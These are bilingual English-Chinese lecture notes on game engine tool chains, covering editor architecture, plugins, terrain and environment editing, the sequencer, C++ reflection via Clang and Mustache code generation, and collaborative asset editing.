• Easy to get a mismatch between the engine version and the schema version

      引擎版本和架构版本容易不匹配

    • Difficult to define function in the structure

      难以在结构中定义函数

    • Need to implement complete syntax

      需要实现完整的语法

    Defined in code

    ​在代码中定义

    Pros

    ​优点

• Easy to accomplish function reflection

      易于实现函数反射

    • Natural support for inheritance relationships

      自然支持继承关系

    Cons

    ​缺点

    • Difficult to understand

      难以理解

    • High coupling

      高耦合

    Three Views For Engine Data

    webp

    ​数据以三个形式存在:存储器中、运算器中,还要便于用户理解。

    Runtime View

    ​运行时视图

    Focus:

    ​重点:

    • Read at a faster speed

      以更快的速度阅读

    • Calculate at a faster speed

      以更快的速度计算

class RuntimeSpotlight
{
public:
    // Spot light translation matrix
    Matrix4x4 light_trans {Matrix4x4::IDENTITY};
    // Spot light cone
    float inner_cone_radian = 0.0f;
    float outer_cone_radian = 0.0f;
    // Spot light intensity and units
    float intensity = 0.0f;
    LightUnits unit = CANDELA;
    // Spot light color
    Vector4 light_color {Vector4::ZERO};
    // other light data like shadow...
};

    Storage View

    Focus:

    ​重点:

    • Write at a faster speed

      写入速度更快

    • Occupies less hard disk space

      占用更少的硬盘空间

    "Position:X": 1.0,
    "Position:Y": 1.0,
    "Position:Z": 1.0
    "Rotation:X": 0.0,
    "Rotation:Y": 0.0,
    "Rotation:Z": 0.0,
    "Rotation:W" : 1.0,
    "Scale:X": 1.0,
    "Scale:Y": 1.0,
    "Scale:Z": 1.0,
    // cone degree
    "inner cone_degree": 30,
    "outer cone_degree": 60,
    //sds
    "intensity": 0.0,
    "unit": 1
    //other data..

    Tools View

    webp

    Focus:

    ​重点:

    • More understandable form

      更易理解的形式

    • The need for multiple editing modes

      需要多种编辑模式

    Other Point:

    ​其他点:

Tool data does not generally exist. Usually, special processing is done when the UI is generated

    ​工具数据一般不存在,通常在生成 UI 界面时进行特殊处理

    Tools View - Understandable

    webp

    ​比如,计算中使用弧度,但给用户一般使用角度。

Tool View-Various Editor Modes

​工具视图-各种编辑模式

    webp

    Different edit mode for groups with different needs

    ​针对不同需求的群体提供不同的编辑模式

    What You See is What You Get (WYSIWYG)

    ​所见即所得

    User Friendly for Artists

    User Friendly for Designer

    Stand-alone Tools

    webp

Stand-alone tools are tools that can run independently of the engine.

    独立工具是一种可以独立于引擎运行的工具。将 Tool Layer 与其他层并列。

    Pros

    ​优点

    • Suitable for use as a DCC tool plug-in

      适合用作 DCC 工具插件

    • Easy to start developing tools

      易于上手开发工具

    Cons

    ​缺点

    • Difficult to achieve WYSIWYG

      难以实现所见即所得

    In Game Tools

    webp

In-game tools are tools built on top of the engine runtime systems.

    游戏内工具 是一种基于引擎运行时系统工作的工具。将 Tool Layer 置于顶层。

    Pros

    ​优点

    • Access to all engine data directly

      直接访问所有引擎数据

    • Easy to preview the game in the editor

      易于在编辑器中预览游戏

    • Easy to make live in-game editing

      易于进行实时游戏内编辑

    Cons

    ​缺点

    • Complex engine architecture

      引擎架构复杂

• Requires a complete engine UI system to make the editor UI

      需要完整的引擎 UI 系统才能制作编辑器 UI

    • When the engine is crashing, the tools become unusable as well

      当引擎崩溃时,工具也会变得无法使用

    In Game Tools-Editor Mode

    ​游戏工具-编辑器模式

    webp

    Editor Mode: Supports modifying and previewing scene data

    编辑器模式:支持修改和预览场景数据(如 Unity 在运行时调试)

    • Real time preview of scene data modification

      实时预览场景数据修改

    • Logic systems do not tick, so there are more hardware resources available to display more scene details

      逻辑系统不进行 tick,因此有更多的硬件资源来显示更多的场景细节

    Play in Editor (PIE)

    ​在编辑器中玩游戏 (PIE)

    PIE: Directly play game in editor, no need to close editor and start game mode

    PIE:直接在编辑器中玩游戏,无需关闭编辑器并启动游戏模式

    • Save loading time

      节省加载时间

    • The continuity of creation is maintained

      保持创作的连续性

    • Quickly test modifications

      快速测试修改

    Two implementation ways

    ​两种实现方式

    • Play in editor world: Start gameplay systems tick in editor world and play in it

      在编辑器世界中玩游戏:在编辑器世界中启动游戏系统并在其中玩游戏

    • Play in PIE world: Duplicate editor world to create a PIE world and play in it

      在 PIE 世界中玩游戏:复制编辑器世界以创建 PIE 世界并在其中玩游戏

    PIE Mode -Play in Editor World

    ​PIE 模式 - 在编辑器世界中游戏

    webp

    Pros

    ​优点

    • Simple tools-layer architecture

      简单的工具层架构

    • Quick state change

      快速状态更改

    Cons

    ​缺点

    • Game mode may cause data changes

      游戏模式可能导致数据更改

    Example

    ​示例

    • Piccolo

    PIE Mode -Play in PIE World

    ​PIE 模式 - 在 PIE 世界中游戏

    webp

    Pros

    ​优点

    • Data separation

      数据分离

    • Easy to instantiate multiple game instances

      易于实例化多个游戏实例

    Cons

    ​缺点

    • Complex architecture

      架构复杂

    Example

    • Unreal

    One More Thing - Plugin

    ​还有一件事 - 插件

    Game engine developers cannot anticipate every possible game development scenario, so plugins are allowed to extend the engine's functionality.

    ​游戏引擎开发者不可能顾虑到所有可能的游戏开发情况,允许插件扩展游戏引擎的功能。

    Extensibility

    ​可扩展性

    Different games need different customization of engine tools.

    ​不同的游戏需要对引擎工具进行不同的定制。

    Engine tools use plug-in mechanism to satisfy the needs.

    ​引擎工具使用插件机制来满足需求。

    Plug-in-Showcases

    webp

    Plug-in - Framework

    webp

    Plug-in : A software component that adds a specific feature to an existing computer program.

    插件:为现有计算机程序添加特定功能的软件组件。

    PluginManager: Manage plugin loading and unloading.

    PluginManager:管理插件的加载和卸载。

    Interface: A series of abstract classes provided to plug-ins, plug-ins can choose to instantiate different classes to realize the development of corresponding functions.

    Interface:提供给插件的一系列抽象类,插件可以选择实例化不同的类来实现相应功能的开发。

    API: A series of functions exposed by the engine; plug-ins can use these functions to execute the logic we want. A minimal sketch of this framework follows below.

    API:引擎暴露出来的一系列函数,插件可以使用这些函数来执行我们想要的逻辑。
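
    A minimal sketch of such a framework (all names here are illustrative): the engine provides an abstract interface for plug-ins to implement, and a PluginManager handles loading and unloading. A real manager would load plug-ins from shared libraries; this sketch registers them directly to stay self-contained:

    #include <iostream>
    #include <memory>
    #include <string>
    #include <unordered_map>

    // Interface: an abstract class the engine provides for plug-ins to implement.
    class IEditorPlugin
    {
    public:
        virtual ~IEditorPlugin() = default;
        virtual void onLoad()   = 0; // called when the plugin is loaded
        virtual void onUnload() = 0; // called when the plugin is unloaded
    };

    // PluginManager: manages plugin loading and unloading.
    class PluginManager
    {
    public:
        void load(const std::string& name, std::unique_ptr<IEditorPlugin> plugin)
        {
            plugin->onLoad();
            m_plugins[name] = std::move(plugin);
        }
        void unload(const std::string& name)
        {
            auto it = m_plugins.find(name);
            if (it != m_plugins.end())
            {
                it->second->onUnload();
                m_plugins.erase(it);
            }
        }
    private:
        std::unordered_map<std::string, std::unique_ptr<IEditorPlugin>> m_plugins;
    };

    // A sample plugin that could, e.g., add a toolbar button through the engine API.
    class ToolbarButtonPlugin : public IEditorPlugin
    {
    public:
        void onLoad() override   { std::cout << "toolbar button registered\n"; }
        void onUnload() override { std::cout << "toolbar button removed\n"; }
    };

    int main()
    {
        PluginManager manager;
        manager.load("toolbar_button", std::make_unique<ToolbarButtonPlugin>());
        manager.unload("toolbar_button");
    }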

    Plug-in-Add a Toolbar Button

    ​插件-添加工具栏按钮

    webp

    Plug-in -Add a Plug-in Menu in Unreal5

    webp

    Plug-in-Summary

    ​插件概述

    webp

    The meaning of plug-in framework

    ​插件框架的意义

    • Extend editor functionality

      扩展编辑器功能

    • Easy to hot-update thanks to decoupling

      解耦,方便热更新

    • Facilitate the construction of an engine development ecosystem

      方便引擎开发生态的构建

    Plug-in framework requirements

    ​插件框架要求

    • Full API support

      完整的 API 支持

    • Common interface support

      通用接口支持

    References

    ​参考文献

    Lecture 14: Advanced Concepts and Applications of the Engine Tool Chain

    第十四节:引擎工具链高级概念与应用

    Glance of Game Production

    ​游戏制作概览

    Whether working on the environment or animation, placing characters, or creating missions.

    ​是在环境、动画中工作,放置角色,还是创建任务。

    Adapt to Different Game Genres

    ​适应不同的游戏类型

    webp

    Challenges from Real Production

    ​真实游戏开发中的挑战。

    webp

    ​在游戏开发中:

    • Massive amounts of varied data from DCC and engine tools

      大量来自 DCC 和引擎工具的各种数据

    • Artists, designers and programmers with different mindsets

      具有不同思维方式的艺术家、设计师和程序员

    • WYSIWYG is a must for high-quality production

      所见即所得是高质量生产的必要条件

    World Editor - A hub for everything to build the world

    ​世界编辑器 - 构建世界所需一切的枢纽

    webp

    ​Unreal 为游戏开发者提供的界面。

    Editor Viewport: A Special Version of Game Engine

    ​编辑器视口:游戏引擎的特殊版本

    • Main window of interaction between designers and game world

      设计师与游戏世界之间的互动主窗口(便于设计师 Debug 用的互动窗口)

    • Powered by a full game engine in a special "editor" mode

      由特殊“编辑器”模式下的完整游戏引擎驱动

    • Provides a variety of special gadgets and visualizers for editing

      提供各种用于编辑的特殊小工具和可视化器

    WARNING: Editor-only code must be moved out of the released game!

    ​警告:仅编辑器代码必须从发布的游戏中移除!

    Everything is an Editable Object

    ​一切都是一个可编辑的对象

    webp

    • The editing requirements of all objects in the editor world are mostly the same, such as moving, adjusting parameters, etc

      编辑世界中所有对象的编辑要求大多是相同的,例如移动,调整参数等

    Different Views of Objects

    ​对象的不同视图

    • Display all of the objects within the scene

      显示场景中的所有对象

    • Organize objects in different views for user convenience

      在不同视图中组织对象,以方便用户

    webp

    Tree view

    webp

    Categories and groups

    Schema-Driven Object Property Editing

    ​模式驱动的对象属性编辑

    webp

    • Displays all of the editable properties for the selected objects

      显示所选对象的所有可编辑属性

    • Beyond schema, we can define some customized editing utilities for different types

      除了模式之外,我们还可以为不同类型的对象定义一些自定义的编辑实用程序

    Content Browser

    ​内容浏览器

    webp

    • Provide intuitive thumbnail of all assets

      提供所有资产的直观缩略图

    • Share asset among different projects

      在不同项目之间共享资产

    • Evolution of asset management from static file folder to content “ocean”

      资产管理从静态文件夹演变为内容“海洋”

    Editing Utilities in World Editor

    ​世界编辑器中的编辑实用程序

    webp

    Illustration of utilities that make it easy for users to edit game objects.

    ​便于用户编辑游戏对象的图示。

    Mouse Picking

    ​鼠标拾取

    Ray Casting

    射线投射

    webp

    Pros:

    • No cache required

      无需缓存

    • Can support multiple objects on selected rays

      可以支持选定射线上的多个对象

    Cons:

    • Poor query performance

      查询性能较差
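
    A sketch of ray-casting-based picking, simplified to sphere bounds (real editors test against precise geometry or an acceleration structure); note how it naturally supports multiple objects along the ray:

    #include <algorithm>
    #include <cmath>
    #include <iostream>
    #include <optional>
    #include <vector>

    struct Vec3 { float x, y, z; };
    static Vec3  operator-(Vec3 a, Vec3 b) { return {a.x - b.x, a.y - b.y, a.z - b.z}; }
    static float dot(Vec3 a, Vec3 b) { return a.x * b.x + a.y * b.y + a.z * b.z; }

    struct Ray { Vec3 origin; Vec3 dir; };                     // dir assumed normalized
    struct BoundingSphere { Vec3 center; float radius; int object_id; };

    // Returns the distance along the ray where it enters the sphere, if any.
    std::optional<float> intersect(const Ray& ray, const BoundingSphere& s)
    {
        Vec3  oc   = ray.origin - s.center;
        float b    = dot(oc, ray.dir);
        float c    = dot(oc, oc) - s.radius * s.radius;
        float disc = b * b - c;
        if (disc < 0.0f) return std::nullopt;                  // ray misses the sphere
        float t = -b - std::sqrt(disc);
        if (t < 0.0f) return std::nullopt;                     // sphere is behind the ray
        return t;
    }

    // Ray picking: collect every object the ray hits, nearest first.
    std::vector<int> pick(const Ray& ray, const std::vector<BoundingSphere>& scene)
    {
        std::vector<std::pair<float, int>> hits;
        for (const auto& s : scene)
            if (auto t = intersect(ray, s))
                hits.emplace_back(*t, s.object_id);
        std::sort(hits.begin(), hits.end());                   // nearest object first
        std::vector<int> ids;
        for (auto& hit : hits) ids.push_back(hit.second);
        return ids;
    }

    int main()
    {
        std::vector<BoundingSphere> scene = {{{0, 0, 5}, 1.0f, 42}, {{0, 0, 10}, 1.0f, 7}};
        Ray ray{{0, 0, 0}, {0, 0, 1}};                         // e.g. built from the mouse position
        for (int id : pick(ray, scene)) std::cout << id << '\n'; // prints 42 then 7
    }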

    RTT (Render to Texture)

    webp

    Pros:

    • Easy to implement range queries

      易于实现范围查询

    • Ability to complete queries quickly

      能够快速完成查询

    Cons:

    • Need to draw an extra image

      需要绘制额外的图片

    • Obstructed objects cannot be selected

      无法选择被遮挡的物体

    Object Transform Editing

    webp

    The game engine should make it easy for users to perform transform editing on objects.

    ​游戏引擎要便于用户对 Object 作 Transform Editing。

    Terrain

    webp

    Landform

    ​地形

    • Height map

      高度图

    Appearance

    ​外观

    • Texture map

      纹理图

    Vegetation

    ​植被

    • Tree instances

      树木实例

    • Decorator distribution map

      装饰器分布图

    Height Brush

    ​高度画笔

    webp

    • Draw height map to adjust terrain mesh

      绘制高度图以调整地形网格

      • Height change needs to be natural and smooth

        高度变化需要自然流畅

      • Can be easily adjusted to the desired results

        可以轻松调整到所需效果

        • Customized brush

          自定义画笔
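
    A minimal sketch of a height brush (the smoothstep falloff is one possible choice) that raises a grid-based height map smoothly around the brush center:

    #include <cmath>
    #include <iostream>
    #include <vector>

    // A square height map stored row-major.
    struct HeightMap
    {
        int size;
        std::vector<float> heights;
        explicit HeightMap(int n) : size(n), heights(n * n, 0.0f) {}
        float& at(int x, int y) { return heights[y * size + x]; }
    };

    // Apply a circular brush at (cx, cy): full strength at the center,
    // smoothly fading to zero at the radius (smoothstep falloff), so the
    // resulting height change is natural and smooth.
    void applyHeightBrush(HeightMap& map, float cx, float cy, float radius, float strength)
    {
        for (int y = 0; y < map.size; ++y)
            for (int x = 0; x < map.size; ++x)
            {
                float dx = x - cx, dy = y - cy;
                float d = std::sqrt(dx * dx + dy * dy);
                if (d >= radius) continue;
                float t = 1.0f - d / radius;                // 1 at center, 0 at edge
                float falloff = t * t * (3.0f - 2.0f * t);  // smoothstep shape
                map.at(x, y) += strength * falloff;
            }
    }

    int main()
    {
        HeightMap map(16);
        applyHeightBrush(map, 8.0f, 8.0f, 6.0f, 2.0f);
        std::cout << map.at(8, 8) << ' ' << map.at(11, 8) << '\n'; // center raised most
    }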

    Instance Brush

    webp

    ​实例画笔(给地形种树)

    Pros:

    • Instance position is fixed

      实例位置固定

    • Available to further modification

      可进一步修改

    Cons:

    • Large amount of data

      数据量大

    Environment

    ​环境

    webp

    • Sky

      天空

    • Light

      灯光

    • Roads

      道路

    • Rivers

      河流

    From top to bottom, the environment around us presents a living world to the player. Editing these environment elements is also important.

    ​从上到下,我们周围的环境为玩家呈现了一个生动的世界。编辑这些环境元素也很重要。

    Environment - Rule System

    webp

    These rules help users create plausible terrain environments.

    ​有了这些规则,更好地让用户创建合理的地形环境。

    Rules:

    ​规则:

    • Tree will not grow beside objects.

      树不会在物体旁边生长。

    • Tree will not grow in water.

      树不会在水中生长。

    • Tree will not grow on roads.

      树不会在道路上生长。

    Conclusion:

    ​结论:

    • The rule system handles data changes.

      规则系统处理数据变化。

    • Decoupled Environment systems.

      解耦环境系统。
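
    A sketch of how a rule system might filter candidate tree positions; the rules and thresholds below are purely illustrative, but they show how each environment system only contributes a predicate, keeping the systems decoupled:

    #include <cmath>
    #include <functional>
    #include <iostream>
    #include <vector>

    struct Point { float x, y; };

    // Each placement rule is a predicate over a candidate position.
    using PlacementRule = std::function<bool(const Point&)>;

    // Keep only candidates that satisfy every rule; when terrain, water or
    // roads change, just re-run the rules over the affected area.
    std::vector<Point> filterTreePositions(const std::vector<Point>& candidates,
                                           const std::vector<PlacementRule>& rules)
    {
        std::vector<Point> accepted;
        for (const auto& p : candidates)
        {
            bool ok = true;
            for (const auto& rule : rules)
                if (!rule(p)) { ok = false; break; }
            if (ok) accepted.push_back(p);
        }
        return accepted;
    }

    int main()
    {
        // Illustrative rules: water occupies x < 2, a road runs along y == 5.
        std::vector<PlacementRule> rules = {
            [](const Point& p) { return p.x >= 2.0f; },                 // not in water
            [](const Point& p) { return std::abs(p.y - 5.0f) > 1.0f; } // not on the road
        };
        std::vector<Point> candidates = {{1, 1}, {3, 1}, {3, 5}};
        for (const auto& p : filterTreePositions(candidates, rules))
            std::cout << p.x << ',' << p.y << '\n';                     // only 3,1 survives
    }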

    Editor Plugin Architecture

    ​编辑器插件架构

    Examples of Plug-in Modules in Commercial Software

    ​商业软件中的插件模块示例

    webp

    A Cross Matrix between Systems and Objects

    ​系统与对象之间的交叉矩阵

    webp

    Any system and object type could be plug-ins to Editors

    ​任何系统和对象类型都可以成为编辑器的插件

    Combination of Multiple Plugins

    ​多个插件的组合

    webp

    Covered

    ​覆盖

    • Only execute the newly registered logic, skip the original logic

      仅执行新注册的逻辑,跳过原始逻辑

    • Ex. Terrain editing overwrite

      例如地形编辑覆盖

    webp

    Distributed

    ​分布式

    • Each plugin will be executed, and if there is an output, the results will eventually be merged

      每个插件都会被执行,如果有输出,结果最终会被合并

    • Ex. Most specialized systems are edited separately

      例如大多数特殊系统都是单独编辑的

    webp

    Pipeline

    ​管道

    • Input and output are connected to each other, generally input and output are the same data type

      输入和输出相互连接,通常输入和输出是相同的数据类型

    • Ex. Asset preprocessing, geometry for physics

      例如资产预处理、物理几何

    webp

    Onion rings

    ​洋葱圈

    • On the basis of the pipeline, the core logic of the system is in the middle, and the plug-in pays attention to the logic of entering and exiting at the same time

      在管线的基础上,系统的核心逻辑在中间,插件同时关注进入和退出的逻辑

    • Ex. Road editing plugin with terrain plugin

      Ex. 道路编辑插件与地形插件

    One More Thing-Version Control

    ​还有一件事-版本控制

    A certain version relationship is required between the plug-in and the host application to ensure that they can work together normally.

    ​插件和宿主应用之间需要有一定的版本关系,才能保证它们能够正常协同工作。

    • Plug-in use the same version number with the host application

      插件使用与宿主应用相同的版本号

    • Plug-in use the version number of the plug-in interface

      插件使用插件接口的版本号

    • This is more recommended because the update frequency of the plug-in interface and the software may be different

        这是比较推荐的做法,因为插件接口和软件的更新频率可能不一样

    Design Narrative Tools

    ​设计叙述工具

    Storytelling in Game Engine

    ​游戏引擎中的故事叙述

    Control many parameters variance in the timeline

    ​控制时间轴中的许多参数变化

    webp

    Sequencer

    ​序列发生器(做动画的软件里常有)

    webp

    • Track: In order to reference actors in your sequence. Any character, prop, camera, effect, or other actors can be referenced and manipulated in Sequencer

      轨道:为了引用序列中的演员。任何角色、道具、摄像机、效果或其他演员都可以在 Sequencer 中引用和操纵

    • Property Track: Property of reference actors in track

      属性轨道:轨道中引用演员的属性

    • Timeline: A line describing time in discrete frames

      时间轴:描述离散帧中时间的线

    • Key Frame: The key frames can manipulate properties. Upon reaching a key frame in the timeline, the track’s properties are updated to reflect the values you have defined at that point

      关键帧:关键帧可以操纵属性。到达时间轴中的关键帧后,轨道的属性将更新以反映您在该点定义的值

    • Sequence: Sequencer’s data

      序列:Sequencer 的数据

    Sequencer - Bind Objects to Track

    ​序列器 - 将对象绑定到轨道

    webp

    How to let the sequencer control my “chick”

    ​如何让音序器控制我的“小鸡”

    • Bind the “chick” to Track

      将“小鸡”绑定到轨道

    Sequencer-Bind Object Property to Property Track

    ​Sequencer-将对象属性绑定到属性轨道

    How to control the moving position of the “chick”

    ​如何控制“小鸡”的移动位置

    • Bind the position property to a property track

      将位置属性绑定到属性轨道

    Sequencer-Set Key Frame

    ​Sequencer-设置关键帧

    How to make a “chick” reach a specified position

    ​如何让“小鸡”到达指定位置

    Sequencer-Set Key Frames

    ​序列器设置关键帧

    A, B, C, D are key frames.

    ​A、B、C、D 是关键帧。

    How does the “chick” go from A to B to C to D

    ​“小鸡”如何从 A 到 B 再到 C 再到 D

    webp

    Sequencer - Interpolate Properties along Key Frames

    ​Sequencer - 沿关键帧插值属性

    Similar to animation, set key frames

    ​与动画类似,设置关键帧

    webp
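
    A minimal sketch of key-frame interpolation for a single scalar property track (linear interpolation only; real sequencers support richer curves):

    #include <iostream>
    #include <vector>

    struct KeyFrame
    {
        float time;
        float value;
    };

    // Evaluate a property track at the given time by linearly
    // interpolating between the surrounding key frames (keys sorted by time).
    float evaluateTrack(const std::vector<KeyFrame>& keys, float time)
    {
        if (keys.empty()) return 0.0f;
        if (time <= keys.front().time) return keys.front().value;
        if (time >= keys.back().time) return keys.back().value;
        for (size_t i = 1; i < keys.size(); ++i)
            if (time < keys[i].time)
            {
                const KeyFrame& a = keys[i - 1];
                const KeyFrame& b = keys[i];
                float t = (time - a.time) / (b.time - a.time);
                return a.value + t * (b.value - a.value);
            }
        return keys.back().value;
    }

    int main()
    {
        // Key frames A, B, C, D for, say, the chick's x position.
        std::vector<KeyFrame> keys = {{0, 0}, {1, 10}, {2, 10}, {3, 0}};
        std::cout << evaluateTrack(keys, 0.5f) << '\n'; // 5: halfway between A and B
    }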

    Reflection and GamePlay

    Reflection is Foundation of Sequencer

    ​反射是 Sequencer 的基础

    webp

    Any data in the game engine can be bound into a track based on the reflection system

    ​游戏引擎中的任何数据都可以基于反射系统绑定到轨道中

    Complexity of Game Play

    Visual Scripting System

    webp

    ​可视化编程系统,如蓝图。

    Hard Code Method for More Features

    ​硬编码方法实现更多功能,但是代码也更复杂。

    class Human : public Object
    {
    public:
        void Jump()
        {
            // do something ...
        }
        void StopJump()
        {
            // do something ...
        }
    };

    void CallFunction(Object* instance, string type_name, string func_name)
    {
        if (type_name == "Human") {
            Human* human = (Human*)instance;
            if (func_name == "Jump") {
                human->Jump();
            }
            else if (func_name == "StopJump") {
                human->StopJump();
            }
        }
    }

    A Common Solution - Reflection

    ​常见解决方案 - 反射

    In computer science, reflective programming or reflection is the ability of a process to examine, introspect and modify its own structure and behavior.

    ​在计算机科学中,反射编程或反射是指进程检查、自省和修改自身结构和行为的能力。

    Modern high-level programming languages generally have reflection built into their design.

    ​现在高级的语言编程都有反射的设计。

    JAVA Reflection

    package Demo;
    public class Test {
    public int m_filed;
    public void print()
    {
    System.out.print("call print().");
    };
    }
    package Demo;
    import java.lang.refelect.Field;
    import java.lang.refelect.Method;
    public class Demo {
    public static void main(String[] args) throws Exception {
    Class<?> cls = Class.forName("Demo.test");
    Object obj = cls.getConstructor().newInstance();
    Field filed_accessor = cls.getField("m_filed");
    filed_accessor.set(obj, 2);

    Method method_accessor = cls.getMethod("print");
    method_accessor.invoke(obj);
    }
    }

    Reflection Builds the Bridge between Code and Tools

    ​反射在代码和工具之间搭建桥梁

    Using reflection to generate a code meta information map

    ​使用反射生成代码元信息图

    • class_name, func_name and para_name

    • generate accessor and invoker

      生成访问器和调用器

    class Human : public Object
    {
    public:
        void Jump()
        {
            // do something ...
        }

        void StopJump()
        {
            // do something ...
        }
    };

    void CallFunction(Object* instance, string type_name, string func_name)
    {
        FunctionPtr function_ptr = FunctionInfoMap::getInvokeFunction(instance, type_name, func_name);
        function_ptr->invoke();
    }

    How to Implement Reflection in C++

    ​如何在 C++ 中实现反射

    • Collect type info from code

      从代码中收集类型信息

    • Generate code to provide accessors for fields and methods

      生成代码以提供字段和方法的访问器

    • Manage all accessors with a <string,accessor> map

      使用 <string,accessor> 映射管理所有访问器
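
    A minimal sketch of the last step (the class, field, and map below are hypothetical; in a real engine these entries are emitted by the code generator rather than written by hand):

    #include <functional>
    #include <iostream>
    #include <string>
    #include <unordered_map>

    class Human
    {
    public:
        float jump_height = 0.0f;
    };

    // One setter accessor per reflected field, looked up by field name.
    using FieldSetter = std::function<void(Human&, float)>;

    std::unordered_map<std::string, FieldSetter> g_field_setters = {
        {"jump_height", [](Human& h, float v) { h.jump_height = v; }},
    };

    int main()
    {
        Human human;
        // A tool (e.g. the property editor) only knows the field name.
        g_field_setters.at("jump_height")(human, 1.5f);
        std::cout << human.jump_height << '\n'; // 1.5
    }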

    How to Get Type Info from Code

    ​如何从代码中获取类型信息

    General Programming Language (GPL) Compilation Process

    ​通用编程语言 (GPL) 编译过程

    webp

    Abstract Syntax Tree (AST): An abstract representation of the syntax structure of source code. It represents the syntax structure of programming language in the form of a tree, and each node in the tree represents a construct in the source code.

    抽象语法树(AST):源代码语法结构的抽象表示。它以树的形式表示编程语言的语法结构,树中的每个节点代表源代码中的一个构造。

    webp

    Why Piccolo Uses Clang

    webp

    One of Clang’s main goals is to provide a library-based architecture, so that the compiler could interoperate with other tools that interact with source code.

    ​Clang 的主要目标之一是提供基于库的架构,以便编译器可以与其他与源代码交互的工具进行互操作。

    Generate Schema From AST

    ​从 AST 生成模式

    webp

    • Parse the AST for type names, field names, field types, etc

      解析 AST,例如类型名称、字段名称、字段类型等

    • Build a temporary schema of data in memory

      在内存中构建数据的临时模式

    Precise Control of Reflection Scope

    ​精确控制反射作用域

    webp

    In the actual scenario, we need to add a lot of tag information to identify the purpose of the type.

    ​实际场景中,我们需要添加很多标签信息来标识类型的用途。

    Use Macros to Add Reflection Controls

    ​使用宏添加反射控制

    webp

    Add tags by __attribute__

    ​通过 __attribute__ 添加标签

    • __attribute__ is a source code annotation provided by clang. In the code, the required data types can be captured by using these macros.

      __attribute__ 是 clang 提供的源代码注释,在代码中可以通过这些宏来捕获需要的数据类型。

    • Define a “CLASS” macro to distinguish between precompile and compile.

      定义一个 “CLASS” 宏来区分预编译和编译。

      • When precompiling, define the “__REFLECTION_PARSER__” macro in the meta parser to make the attribute information effective

        预编译时,在 meta parser 中定义“__REFLECTION_PARSER__”宏,使属性信息生效
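
    A sketch of this macro trick, modeled on the approach described above (the exact macro names and tags are illustrative): when the meta parser runs clang over the headers it defines __REFLECTION_PARSER__, so the annotations appear in the AST, while the normal compile sees a plain class:

    // Under the meta parser, CLASS/META expand to clang annotations that the
    // parser can read out of the AST; under the normal compile they vanish.
    #if defined(__REFLECTION_PARSER__)
    #define CLASS(class_name, ...) class __attribute__((annotate(#__VA_ARGS__))) class_name
    #define META(...) __attribute__((annotate(#__VA_ARGS__)))
    #else
    #define CLASS(class_name, ...) class class_name
    #define META(...)
    #endif

    // The annotation tags tell the parser what to reflect.
    CLASS(Human, Fields)
    {
    public:
        META(Editable)
        float jump_height = 0.0f;
    };

    int main()
    {
        Human h;
        h.jump_height = 1.0f;
        return 0;
    }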

    Reflection Accessors

    ​反射访问器

    webp

    Generate reflection accessors using schemas

    ​使用模式生成反射访问器

    • For classes, we need to generate type info getters

      对于类,我们需要生成类型信息获取器

    • For fields, we need to generate setters and getters that can access them

      对于字段,我们需要生成可以访问它们的设置器和获取器

    • For functions, we need to generate invokers that can invoke them

      对于函数,我们需要生成可以调用它们的调用器

    Code Rendering

    ​代码渲染

    Business code of the same type shares the same structure.

    ​同类型的业务代码结构都是一样的。

    webp

    Code Rendering

    ​代码渲染

    Code Rendering is the process of collecting data (if any) and loading related templates (or sending output directly). The collected data is then applied to the associated template. The final output is sent to the user.

    ​代码渲染是收集数据(如果有)并加载相关模板(或直接发送输出)的过程。然后将收集的数据应用于相关模板。最终输出将发送给用户。

    Pros:

    ​优点

    • Strong separation of code and data

      代码和数据完全分离

    Code Rendering-Mustache

    ​代码渲染-Mustache

    webp

    Mustache is a web template system.

    ​Mustache 是一个 Web 模板系统。

    It is named “Mustache” because of heavy use of braces, {{}}, that resemble a sideways moustache.

    ​它被命名为“Mustache”,因为它大量使用了花括号 {{}},形似横放的胡子。

    Use Mustache for Code Generation

    ​使用 Mustache 进行代码生成

    webp

    • Implementing business logic using mustache templates

      使用 Mustache 模板实现业务逻辑

    • Generate code through mustache rendering

      通过 Mustache 渲染生成代码
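
    A toy substitution renderer is enough to show the idea (this is a hand-rolled sketch, not the real Mustache library, which also supports sections, escaping, and partials):

    #include <iostream>
    #include <string>
    #include <unordered_map>

    // Replace every {{key}} tag in the template with its value from the data map.
    std::string render(std::string tmpl,
                       const std::unordered_map<std::string, std::string>& data)
    {
        for (const auto& [key, value] : data)
        {
            const std::string tag = "{{" + key + "}}";
            for (size_t pos = tmpl.find(tag); pos != std::string::npos;
                 pos = tmpl.find(tag, pos + value.size()))
                tmpl.replace(pos, tag.size(), value);
        }
        return tmpl;
    }

    int main()
    {
        // Template for a generated field setter; class_name / field_name would
        // come from the schema parsed out of the AST.
        std::string tmpl =
            "void set_{{field_name}}({{class_name}}* obj, float v)\n"
            "{ obj->{{field_name}} = v; }\n";
        std::cout << render(tmpl, {{"class_name", "Human"}, {"field_name", "jump_height"}});
    }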

    Collaborative Editing

    ​协作编辑

    A game development project may require many people editing collaboratively.

    ​一个游戏开发项目可能需要多个人来协作编辑。

    Bottlenecks in Large Projects

    ​大型项目的瓶颈

    webp

    • Lots of people work with lots of assets

      许多人使用大量资产

    • Assets version management is very difficult

      资产版本管理非常困难

    Merging Conflicts is The Biggest Problem

    ​合并冲突是最大的问题

    webp

    • Everyone needs to spend a lot of time on merging conflicts when updating or uploading assets

      每个人在更新或上传资产时都需要花费大量时间解决合并冲突

    How to Reduce Conflicts

    ​如何减少冲突

    • Split assets into smaller parts to reduce the probability of conflicts

      将资产拆分成更小的部分以减少冲突的可能性

      • Layering the world

        分层世界

      • Divide the world

        划分世界

      • One file per actor (OFPA)

        每个演员一个文件 (OFPA)

    • All people work in the same scene to completely eliminate the conflict

      所有人都在同一个场景中工作以完全消除冲突

    Split Assets-Layering the World

    ​拆分资产 - 分层世界

    webp

    • Split the world into many layers, each of which is stored in an asset file

      将世界拆分成多个层,每个层都存储在资产文件中

    • Different people work at different levels

      不同的人在不同的层面上工作

    Pros

    • Appropriate layers would decrease edit confliction

      适当的层会减少编辑冲突

    • Layer-based logic available

      提供基于层的逻辑

    Cons

    • Layer logic may depend on another layer

      层逻辑可能依赖于另一层

    • Difficult to reasonably split layers when the world is very complex

      当世界非常复杂时,很难合理地拆分层

    Split Assets- Divide the World

    ​分割资产 - 划分世界

    webp

    • The world is divided into fixed size blocks, and each block is saved in an asset file

      世界被划分为固定大小的区块,每个区块都保存在资产文件中

    • Different people work at different blocks

      不同的人在不同的区块工作

    Pros

    • Location based splitting makes it easy to dynamically expand the world

      基于位置的分割使动态扩展世界变得容易

    • Spatial separation is more intuitive to operators

      空间分离对操作员来说更直观

    Cons

    • Difficult to deal with objects across multiple blocks

      难以处理跨多个块的对象

